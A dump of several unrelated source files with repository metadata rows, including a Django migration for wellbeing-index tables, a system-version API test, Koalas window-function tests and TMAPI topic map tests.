('avg_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('stddev_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('n', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'bns_wbi_landscape_livelihood',
'managed': False,
},
),
migrations.CreateModel(
name='WBIPerVillageEthnicity',
fields=[
('id', models.BigIntegerField(primary_key=True, serialize=False)),
('dataset_year', models.IntegerField(blank=True, null=True)),
('ethnicity', models.TextField(blank=True, null=True)),
('village', models.TextField(blank=True, null=True)),
('district', models.TextField(blank=True, null=True)),
('landscape', models.TextField(blank=True, null=True)),
('avg_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('stddev_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('n', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'bns_wbi_village_ethnicity',
'managed': False,
},
),
migrations.CreateModel(
name='WBIPerVillageGender',
fields=[
('id', models.BigIntegerField(primary_key=True, serialize=False)),
('dataset_year', models.IntegerField(blank=True, null=True)),
('gender', models.TextField(blank=True, null=True)),
('village', models.TextField(blank=True, null=True)),
('district', models.TextField(blank=True, null=True)),
('landscape', models.TextField(blank=True, null=True)),
('avg_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('stddev_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('n', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'bns_wbi_village_gender',
'managed': False,
},
),
migrations.CreateModel(
name='WBIPerVillageHHType',
fields=[
('id', models.BigIntegerField(primary_key=True, serialize=False)),
('dataset_year', models.IntegerField(blank=True, null=True)),
('hh_type', models.TextField(blank=True, null=True)),
('village', models.TextField(blank=True, null=True)),
('district', models.TextField(blank=True, null=True)),
('landscape', models.TextField(blank=True, null=True)),
('avg_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('stddev_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('n', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'bns_wbi_village_hh_type',
'managed': False,
},
),
migrations.CreateModel(
name='WBIPerVillageLivelihood',
fields=[
('id', models.BigIntegerField(primary_key=True, serialize=False)),
('dataset_year', models.IntegerField(blank=True, null=True)),
('livelihood_1', models.TextField(blank=True, null=True)),
('village', models.TextField(blank=True, null=True)),
('district', models.TextField(blank=True, null=True)),
('landscape', models.TextField(blank=True, null=True)),
('avg_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('stddev_wbi', models.DecimalField(blank=True, decimal_places=6, max_digits=29, null=True)),
('n', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'bns_wbi_village_livelihood',
'managed': False,
},
),
]
| 50.954128
| 108
| 0.555275
| 1,069
| 11,108
| 5.624883
| 0.069224
| 0.125728
| 0.129719
| 0.169632
| 0.924996
| 0.924996
| 0.864959
| 0.843506
| 0.843506
| 0.843506
| 0
| 0.012123
| 0.301945
| 11,108
| 217
| 109
| 51.18894
| 0.763348
| 0.004051
| 0
| 0.796209
| 1
| 0
| 0.131001
| 0.043667
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004739
| 0
| 0.018957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ad97d41840b1e674c9a252d1ff0a7f004c855680
| 1,973
|
py
|
Python
|
ozone-framework-python-server/tests/test_system_version_view.py
|
aamduka/ozone
|
3fdbf232f5ea70661204a632e45310ca9d374973
|
[
"Apache-2.0"
] | 6
|
2020-02-21T22:06:31.000Z
|
2020-12-08T10:48:07.000Z
|
ozone-framework-python-server/tests/test_system_version_view.py
|
aamduka/ozone
|
3fdbf232f5ea70661204a632e45310ca9d374973
|
[
"Apache-2.0"
] | 12
|
2019-12-26T17:38:40.000Z
|
2022-02-10T14:15:55.000Z
|
ozone-framework-python-server/tests/test_system_version_view.py
|
aamduka/ozone
|
3fdbf232f5ea70661204a632e45310ca9d374973
|
[
"Apache-2.0"
] | 4
|
2019-08-05T13:22:29.000Z
|
2021-07-21T16:04:03.000Z
|
from rest_framework.test import APIClient
from django.test import TestCase
from django.conf import settings
requests = APIClient()
class SimpleSystemVersionTest(TestCase):
fixtures = ['resources/fixtures/default_data.json', ]
def test_authentication(self):
requests.login(email='admin@goss.com', password='password')
request = requests.get('/system-version')
self.assertEqual(request.status_code, 200)
requests.logout()
requests.login(email='user@goss.com', password='password')
request = requests.get('/system-version')
self.assertEqual(request.status_code, 200)
requests.logout()
request = requests.get('/system-version')
self.assertEqual(request.status_code, 403)
def test_get_system_version(self):
requests.login(email='admin@goss.com', password='password')
request = requests.get('/system-version')
self.assertEqual(request.data, {'version': settings.SYSTEM_VERSION})
requests.logout()
def test_post_system_version(self):
requests.login(email='admin@goss.com', password='password')
request = requests.post('/system-version')
self.assertEqual(request.status_code, 405)
requests.logout()
def test_put_system_version(self):
requests.login(email='admin@goss.com', password='password')
request = requests.put('/system-version')
self.assertEqual(request.status_code, 405)
requests.logout()
def test_patch_system_version(self):
requests.login(email='admin@goss.com', password='password')
request = requests.patch('/system-version')
self.assertEqual(request.status_code, 405)
requests.logout()
def test_delete_system_version(self):
requests.login(email='admin@goss.com', password='password')
request = requests.delete('/system-version')
self.assertEqual(request.status_code, 405)
requests.logout()
| 37.226415
| 76
| 0.68373
| 221
| 1,973
| 5.986425
| 0.19457
| 0.137566
| 0.167045
| 0.169312
| 0.750567
| 0.750567
| 0.750567
| 0.750567
| 0.750567
| 0.750567
| 0
| 0.013125
| 0.189052
| 1,973
| 52
| 77
| 37.942308
| 0.81375
| 0
| 0
| 0.547619
| 0
| 0
| 0.160162
| 0.018246
| 0
| 0
| 0
| 0
| 0.190476
| 1
| 0.142857
| false
| 0.166667
| 0.071429
| 0
| 0.261905
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d1363d32428bbf0ca420ee94d7773b4958aa4a07
| 21
|
py
|
Python
|
ms5837/__init__.py
|
rgov/ms5837-python
|
ff2de6476c8f7e6fe9b3d8182e34b0f3dd2e65c8
|
[
"MIT"
] | null | null | null |
ms5837/__init__.py
|
rgov/ms5837-python
|
ff2de6476c8f7e6fe9b3d8182e34b0f3dd2e65c8
|
[
"MIT"
] | null | null | null |
ms5837/__init__.py
|
rgov/ms5837-python
|
ff2de6476c8f7e6fe9b3d8182e34b0f3dd2e65c8
|
[
"MIT"
] | null | null | null |
from ms5837 import *
| 10.5
| 20
| 0.761905
| 3
| 21
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 0.190476
| 21
| 1
| 21
| 21
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0f1873d8287129110ff0bd37228c8beb922a7a58
| 94
|
py
|
Python
|
register/admin/__init__.py
|
Ajuajmal/heroku
|
f23aad8c392a273caf0da39cedeec4746ded29dc
|
[
"0BSD"
] | null | null | null |
register/admin/__init__.py
|
Ajuajmal/heroku
|
f23aad8c392a273caf0da39cedeec4746ded29dc
|
[
"0BSD"
] | null | null | null |
register/admin/__init__.py
|
Ajuajmal/heroku
|
f23aad8c392a273caf0da39cedeec4746ded29dc
|
[
"0BSD"
] | null | null | null |
import register.admin.accommodation
import register.admin.attendee
import register.admin.food
| 23.5
| 35
| 0.87234
| 12
| 94
| 6.833333
| 0.5
| 0.512195
| 0.695122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06383
| 94
| 3
| 36
| 31.333333
| 0.931818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0f3b29bae0983241619f39587a054b363f7e68e2
| 13,075
|
py
|
Python
|
databricks/koalas/tests/test_window.py
|
varunsh-coder/koalas
|
1cfc9ec76a1b023d89870688bf802cf58df537f1
|
[
"Apache-2.0"
] | 3,211
|
2019-04-22T04:40:50.000Z
|
2022-03-31T10:42:31.000Z
|
databricks/koalas/tests/test_window.py
|
varunsh-coder/koalas
|
1cfc9ec76a1b023d89870688bf802cf58df537f1
|
[
"Apache-2.0"
] | 2,017
|
2019-04-21T23:37:12.000Z
|
2022-03-24T03:48:51.000Z
|
databricks/koalas/tests/test_window.py
|
varunsh-coder/koalas
|
1cfc9ec76a1b023d89870688bf802cf58df537f1
|
[
"Apache-2.0"
] | 375
|
2019-04-21T23:58:57.000Z
|
2022-03-30T00:42:19.000Z
|
#
# Copyright (C) 2019 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import inspect
from databricks import koalas as ks
from databricks.koalas.exceptions import PandasNotImplementedError
from databricks.koalas.missing.window import (
MissingPandasLikeExpanding,
MissingPandasLikeRolling,
MissingPandasLikeExpandingGroupby,
MissingPandasLikeRollingGroupby,
)
from databricks.koalas.testing.utils import ReusedSQLTestCase, TestUtils
class ExpandingRollingTest(ReusedSQLTestCase, TestUtils):
def test_missing(self):
kdf = ks.DataFrame({"a": [1, 2, 3, 4, 5, 6, 7, 8, 9]})
# Expanding functions
missing_functions = inspect.getmembers(MissingPandasLikeExpanding, inspect.isfunction)
unsupported_functions = [
name for (name, type_) in missing_functions if type_.__name__ == "unsupported_function"
]
for name in unsupported_functions:
with self.assertRaisesRegex(
PandasNotImplementedError,
"method.*Expanding.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.expanding(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError,
"method.*Expanding.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.a.expanding(1), name)() # Series
deprecated_functions = [
name for (name, type_) in missing_functions if type_.__name__ == "deprecated_function"
]
for name in deprecated_functions:
with self.assertRaisesRegex(
PandasNotImplementedError, "method.*Expanding.*{}.*is deprecated".format(name)
):
getattr(kdf.expanding(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError, "method.*Expanding.*{}.*is deprecated".format(name)
):
getattr(kdf.a.expanding(1), name)() # Series
# Rolling functions
missing_functions = inspect.getmembers(MissingPandasLikeRolling, inspect.isfunction)
unsupported_functions = [
name for (name, type_) in missing_functions if type_.__name__ == "unsupported_function"
]
for name in unsupported_functions:
with self.assertRaisesRegex(
PandasNotImplementedError,
"method.*Rolling.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.rolling(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError,
"method.*Rolling.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.a.rolling(1), name)() # Series
deprecated_functions = [
name for (name, type_) in missing_functions if type_.__name__ == "deprecated_function"
]
for name in deprecated_functions:
with self.assertRaisesRegex(
PandasNotImplementedError, "method.*Rolling.*{}.*is deprecated".format(name)
):
getattr(kdf.rolling(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError, "method.*Rolling.*{}.*is deprecated".format(name)
):
getattr(kdf.a.rolling(1), name)() # Series
# Expanding properties
missing_properties = inspect.getmembers(
MissingPandasLikeExpanding, lambda o: isinstance(o, property)
)
unsupported_properties = [
name
for (name, type_) in missing_properties
if type_.fget.__name__ == "unsupported_property"
]
for name in unsupported_properties:
with self.assertRaisesRegex(
PandasNotImplementedError,
"property.*Expanding.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.expanding(1), name) # Frame
with self.assertRaisesRegex(
PandasNotImplementedError,
"property.*Expanding.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.a.expanding(1), name) # Series
deprecated_properties = [
name
for (name, type_) in missing_properties
if type_.fget.__name__ == "deprecated_property"
]
for name in deprecated_properties:
with self.assertRaisesRegex(
PandasNotImplementedError, "property.*Expanding.*{}.*is deprecated".format(name)
):
getattr(kdf.expanding(1), name) # Frame
with self.assertRaisesRegex(
PandasNotImplementedError, "property.*Expanding.*{}.*is deprecated".format(name)
):
getattr(kdf.a.expanding(1), name) # Series
# Rolling properties
missing_properties = inspect.getmembers(
MissingPandasLikeRolling, lambda o: isinstance(o, property)
)
unsupported_properties = [
name
for (name, type_) in missing_properties
if type_.fget.__name__ == "unsupported_property"
]
for name in unsupported_properties:
with self.assertRaisesRegex(
PandasNotImplementedError,
"property.*Rolling.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.rolling(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError,
"property.*Rolling.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.a.rolling(1), name)() # Series
deprecated_properties = [
name
for (name, type_) in missing_properties
if type_.fget.__name__ == "deprecated_property"
]
for name in deprecated_properties:
with self.assertRaisesRegex(
PandasNotImplementedError, "property.*Rolling.*{}.*is deprecated".format(name)
):
getattr(kdf.rolling(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError, "property.*Rolling.*{}.*is deprecated".format(name)
):
getattr(kdf.a.rolling(1), name)() # Series
def test_missing_groupby(self):
kdf = ks.DataFrame({"a": [1, 2, 3, 4, 5, 6, 7, 8, 9]})
# Expanding functions
missing_functions = inspect.getmembers(
MissingPandasLikeExpandingGroupby, inspect.isfunction
)
unsupported_functions = [
name for (name, type_) in missing_functions if type_.__name__ == "unsupported_function"
]
for name in unsupported_functions:
with self.assertRaisesRegex(
PandasNotImplementedError,
"method.*Expanding.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.groupby("a").expanding(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError,
"method.*Expanding.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.a.groupby(kdf.a).expanding(1), name)() # Series
deprecated_functions = [
name for (name, type_) in missing_functions if type_.__name__ == "deprecated_function"
]
for name in deprecated_functions:
with self.assertRaisesRegex(
PandasNotImplementedError, "method.*Expanding.*{}.*is deprecated".format(name)
):
getattr(kdf.groupby("a").expanding(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError, "method.*Expanding.*{}.*is deprecated".format(name)
):
getattr(kdf.a.groupby(kdf.a).expanding(1), name)() # Series
# Rolling functions
missing_functions = inspect.getmembers(MissingPandasLikeRollingGroupby, inspect.isfunction)
unsupported_functions = [
name for (name, type_) in missing_functions if type_.__name__ == "unsupported_function"
]
for name in unsupported_functions:
with self.assertRaisesRegex(
PandasNotImplementedError,
"method.*Rolling.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.groupby("a").rolling(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError,
"method.*Rolling.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.a.groupby(kdf.a).rolling(1), name)() # Series
deprecated_functions = [
name for (name, type_) in missing_functions if type_.__name__ == "deprecated_function"
]
for name in deprecated_functions:
with self.assertRaisesRegex(
PandasNotImplementedError, "method.*Rolling.*{}.*is deprecated".format(name)
):
getattr(kdf.rolling(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError, "method.*Rolling.*{}.*is deprecated".format(name)
):
getattr(kdf.a.rolling(1), name)() # Series
# Expanding properties
missing_properties = inspect.getmembers(
MissingPandasLikeExpandingGroupby, lambda o: isinstance(o, property)
)
unsupported_properties = [
name
for (name, type_) in missing_properties
if type_.fget.__name__ == "unsupported_property"
]
for name in unsupported_properties:
with self.assertRaisesRegex(
PandasNotImplementedError,
"property.*Expanding.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.groupby("a").expanding(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError,
"property.*Expanding.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.a.groupby(kdf.a).expanding(1), name)() # Series
deprecated_properties = [
name
for (name, type_) in missing_properties
if type_.fget.__name__ == "deprecated_property"
]
for name in deprecated_properties:
with self.assertRaisesRegex(
PandasNotImplementedError, "property.*Expanding.*{}.*is deprecated".format(name)
):
getattr(kdf.expanding(1), name) # Frame
with self.assertRaisesRegex(
PandasNotImplementedError, "property.*Expanding.*{}.*is deprecated".format(name)
):
getattr(kdf.a.expanding(1), name) # Series
# Rolling properties
missing_properties = inspect.getmembers(
MissingPandasLikeRollingGroupby, lambda o: isinstance(o, property)
)
unsupported_properties = [
name
for (name, type_) in missing_properties
if type_.fget.__name__ == "unsupported_property"
]
for name in unsupported_properties:
with self.assertRaisesRegex(
PandasNotImplementedError,
"property.*Rolling.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.groupby("a").rolling(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError,
"property.*Rolling.*{}.*not implemented( yet\\.|\\. .+)".format(name),
):
getattr(kdf.a.groupby(kdf.a).rolling(1), name)() # Series
deprecated_properties = [
name
for (name, type_) in missing_properties
if type_.fget.__name__ == "deprecated_property"
]
for name in deprecated_properties:
with self.assertRaisesRegex(
PandasNotImplementedError, "property.*Rolling.*{}.*is deprecated".format(name)
):
getattr(kdf.rolling(1), name)() # Frame
with self.assertRaisesRegex(
PandasNotImplementedError, "property.*Rolling.*{}.*is deprecated".format(name)
):
getattr(kdf.a.rolling(1), name)() # Series
| 43.009868
| 99
| 0.579732
| 1,127
| 13,075
| 6.574091
| 0.108252
| 0.030234
| 0.107977
| 0.215954
| 0.854501
| 0.854501
| 0.854501
| 0.854501
| 0.854501
| 0.854501
| 0
| 0.006402
| 0.307151
| 13,075
| 303
| 100
| 43.151815
| 0.811458
| 0.07044
| 0
| 0.832685
| 0
| 0
| 0.145396
| 0.067449
| 0
| 0
| 0
| 0
| 0.124514
| 1
| 0.007782
| false
| 0
| 0.019455
| 0
| 0.031128
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0f44107664f55734f8d25b15a9df939bfd53701c
| 344
|
py
|
Python
|
07_Java_Experiment/PyTest/fileutil/__init__.py
|
Robert-Stackflow/HUST-Courses
|
300752552e7af035b0e5c7663953850c81871242
|
[
"MIT"
] | 4
|
2021-11-01T09:27:32.000Z
|
2022-03-07T14:24:10.000Z
|
07_Java_Experiment/PyTest/fileutil/__init__.py
|
Robert-Stackflow/HUST-Courses
|
300752552e7af035b0e5c7663953850c81871242
|
[
"MIT"
] | null | null | null |
07_Java_Experiment/PyTest/fileutil/__init__.py
|
Robert-Stackflow/HUST-Courses
|
300752552e7af035b0e5c7663953850c81871242
|
[
"MIT"
] | null | null | null |
from fileutil.utils import find_file_suffix
from fileutil.utils import find_file_name_without_suffix
from fileutil.utils import find_compressed_files
from fileutil.utils import remove_dir
from fileutil.utils import remove_subdir
from fileutil.utils import find_files
from fileutil.utils import copy_dir
from fileutil.utils import write_to_file
| 38.222222
| 56
| 0.883721
| 54
| 344
| 5.37037
| 0.314815
| 0.331034
| 0.468966
| 0.634483
| 0.855172
| 0.348276
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 344
| 8
| 57
| 43
| 0.929487
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0f4641198c087d260c6b8e0f5bdb58a27ce0dc14
| 10,129
|
py
|
Python
|
tmapi/tests/models/test_topic_map.py
|
ajenhl/django-tmapi
|
02f009e1b508218cf330ca7748c3a1dd110f3e8d
|
[
"Apache-2.0"
] | 2
|
2015-03-22T03:23:36.000Z
|
2017-01-08T10:57:18.000Z
|
tmapi/tests/models/test_topic_map.py
|
ajenhl/django-tmapi
|
02f009e1b508218cf330ca7748c3a1dd110f3e8d
|
[
"Apache-2.0"
] | null | null | null |
tmapi/tests/models/test_topic_map.py
|
ajenhl/django-tmapi
|
02f009e1b508218cf330ca7748c3a1dd110f3e8d
|
[
"Apache-2.0"
] | 1
|
2020-12-28T04:40:34.000Z
|
2020-12-28T04:40:34.000Z
|
# Copyright 2011 Jamie Norrish (jamie@artefact.org.nz)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing tests for the TopicMap model.
Most if not all of these tests are ported from the public domain tests
that come with the TMAPI 2.0 distribution (http://www.tmapi.org/2.0/).
"""
from tmapi.exceptions import ModelConstraintException, \
UnsupportedOperationException
from tmapi_test_case import TMAPITestCase
class TopicMapTest (TMAPITestCase):
def test_parent (self):
"""Tests if TopicMap.get_parent() returns None."""
self.assertEqual(None, self.tm.get_parent())
def test_topic_creation_subject_identifier (self):
locator = self.create_locator('http://www.example.org/')
self.assertEqual(0, self.tm.get_topics().count())
topic = self.tm.create_topic_by_subject_identifier(locator)
self.assertEqual(1, self.tm.get_topics().count())
self.assertTrue(topic in self.tm.get_topics())
self.assertEqual(1, topic.get_subject_identifiers().count())
self.assertEqual(0, topic.get_item_identifiers().count())
self.assertEqual(0, topic.get_subject_locators().count())
locator2 = topic.get_subject_identifiers()[0]
self.assertEqual(locator, locator2)
def test_topic_creation_subject_identifier_illegal (self):
self.assertRaises(ModelConstraintException,
self.tm.create_topic_by_subject_identifier, None)
def test_topic_creation_subject_locator (self):
locator = self.create_locator('http://www.example.org/')
self.assertEqual(0, self.tm.get_topics().count())
topic = self.tm.create_topic_by_subject_locator(locator)
self.assertEqual(1, self.tm.get_topics().count())
self.assertTrue(topic in self.tm.get_topics())
self.assertEqual(1, topic.get_subject_locators().count())
self.assertEqual(0, topic.get_item_identifiers().count())
self.assertEqual(0, topic.get_subject_identifiers().count())
locator2 = topic.get_subject_locators()[0]
self.assertEqual(locator, locator2)
def test_topic_creation_subject_locator_illegal (self):
self.assertRaises(ModelConstraintException,
self.tm.create_topic_by_subject_locator, None)
def test_topic_creation_item_identifier (self):
locator = self.create_locator('http://www.example.org/')
self.assertEqual(0, self.tm.get_topics().count())
topic = self.tm.create_topic_by_item_identifier(locator)
self.assertEqual(1, self.tm.get_topics().count())
self.assertTrue(topic in self.tm.get_topics())
self.assertEqual(1, topic.get_item_identifiers().count())
self.assertEqual(0, topic.get_subject_identifiers().count())
self.assertEqual(0, topic.get_subject_locators().count())
locator2 = topic.get_item_identifiers()[0]
self.assertEqual(locator, locator2)
def test_topic_creation_item_identifier_illegal (self):
self.assertRaises(ModelConstraintException,
self.tm.create_topic_by_item_identifier, None)
def test_topic_creation_automagic_item_identifier (self):
self.assertEqual(0, self.tm.get_topics().count())
topic = self.tm.create_topic();
self.assertEqual(1, self.tm.get_topics().count())
self.assertTrue(topic in self.tm.get_topics())
self.assertEqual(1, topic.get_item_identifiers().count())
self.assertEqual(0, topic.get_subject_identifiers().count())
self.assertEqual(0, topic.get_subject_locators().count())
def test_topic_by_subject_identifier (self):
locator = self.create_locator('http://www.example.org/')
t = self.tm.get_topic_by_subject_identifier(locator)
self.assertEqual(None, t)
topic = self.tm.create_topic_by_subject_identifier(locator)
t = self.tm.get_topic_by_subject_identifier(locator)
self.assertNotEqual(t, None)
self.assertEqual(topic, t)
topic.remove()
t = self.tm.get_topic_by_subject_identifier(locator)
self.assertEqual(None, t)
def test_topic_by_subject_locator (self):
locator = self.create_locator('http://www.example.org/')
t = self.tm.get_topic_by_subject_locator(locator)
self.assertEqual(None, t)
topic = self.tm.create_topic_by_subject_locator(locator)
t = self.tm.get_topic_by_subject_locator(locator)
self.assertNotEqual(t, None)
self.assertEqual(topic, t)
topic.remove()
t = self.tm.get_topic_by_subject_locator(locator)
self.assertEqual(None, t)
def test_association_creation_type (self):
type_topic = self.create_topic()
self.assertEqual(0, self.tm.get_associations().count())
association = self.tm.create_association(type_topic)
self.assertEqual(1, self.tm.get_associations().count())
self.assertTrue(association in self.tm.get_associations())
self.assertEqual(0, association.get_roles().count())
self.assertEqual(type_topic, association.get_type())
self.assertEqual(0, association.get_scope().count())
def test_association_creation_type_scope_single (self):
type_topic = self.create_topic()
theme = self.create_topic()
self.assertEqual(0, self.tm.get_associations().count())
association = self.tm.create_association(type_topic, (theme,))
self.assertEqual(1, self.tm.get_associations().count())
self.assertTrue(association in self.tm.get_associations())
self.assertEqual(0, association.get_roles().count())
self.assertEqual(type_topic, association.get_type())
self.assertEqual(1, association.get_scope().count())
self.assertTrue(theme in association.get_scope())
def test_association_creation_type_scope_multiple (self):
type_topic = self.create_topic()
theme = self.create_topic()
theme2 = self.create_topic()
self.assertEqual(0, self.tm.get_associations().count())
association = self.tm.create_association(type_topic, (theme, theme2))
self.assertEqual(1, self.tm.get_associations().count())
self.assertTrue(association in self.tm.get_associations())
self.assertEqual(0, association.get_roles().count())
self.assertEqual(type_topic, association.get_type())
self.assertEqual(2, association.get_scope().count())
self.assertTrue(theme in association.get_scope())
self.assertTrue(theme2 in association.get_scope())
def test_association_creation_illegal_type (self):
self.assertRaises(ModelConstraintException,
self.tm.create_association, None)
def test_association_creation_illegal_type_scope (self):
self.assertRaises(ModelConstraintException, self.tm.create_association,
None, [self.tm.create_topic()])
def test_association_creation_illegal_null_collection_scope (self):
# This test is not applicable in this implementation.
pass
def test_association_creation_illegal_null_array_scope (self):
# This test is not applicable in this implementation.
pass
def test_get_from_topic_creation_subject_identifier (self):
"""Verify that create_topic_by_subject_indicator returns
existing topic where that topic has an item identifier
matching the subject identifier."""
locator = self.create_locator('http://www.example.org/')
self.assertEqual(0, self.tm.get_topics().count())
topic = self.tm.create_topic_by_item_identifier(locator)
self.assertEqual(1, self.tm.get_topics().count())
self.assertTrue(topic in self.tm.get_topics())
self.assertEqual(0, topic.get_subject_identifiers().count())
self.assertEqual(1, topic.get_item_identifiers().count())
self.assertEqual(0, topic.get_subject_locators().count())
t = self.tm.create_topic_by_subject_identifier(locator)
self.assertEqual(1, self.tm.get_topics().count())
self.assertEqual(1, topic.get_subject_identifiers().count())
self.assertEqual(1, topic.get_item_identifiers().count())
self.assertEqual(0, topic.get_subject_locators().count())
self.assertEqual(topic, t)
def test_get_from_creation_item_identifier (self):
"""Verify that create_topic_by_item_identifier returns
existing topic where that topic has a subject identifier
matching the item identifier."""
locator = self.create_locator('http://www.example.org/')
self.assertEqual(0, self.tm.get_topics().count())
topic = self.tm.create_topic_by_subject_identifier(locator)
self.assertEqual(1, self.tm.get_topics().count())
self.assertTrue(topic in self.tm.get_topics())
self.assertEqual(1, topic.get_subject_identifiers().count())
self.assertEqual(0, topic.get_item_identifiers().count())
self.assertEqual(0, topic.get_subject_locators().count())
t = self.tm.create_topic_by_item_identifier(locator)
self.assertEqual(1, self.tm.get_topics().count())
self.assertEqual(1, topic.get_subject_identifiers().count())
self.assertEqual(1, topic.get_item_identifiers().count())
self.assertEqual(0, topic.get_subject_locators().count())
self.assertEqual(topic, t)
def test_get_index (self):
self.assertRaises(UnsupportedOperationException, self.tm.get_index,
BogusIndex)
class BogusIndex (object):
pass
| 47.553991
| 79
| 0.698687
| 1,260
| 10,129
| 5.380952
| 0.114286
| 0.143805
| 0.049115
| 0.044248
| 0.825959
| 0.807227
| 0.766667
| 0.737021
| 0.726254
| 0.699705
| 0
| 0.009022
| 0.190246
| 10,129
| 212
| 80
| 47.778302
| 0.817605
| 0.118077
| 0
| 0.685897
| 0
| 0
| 0.018163
| 0
| 0
| 0
| 0
| 0
| 0.544872
| 1
| 0.128205
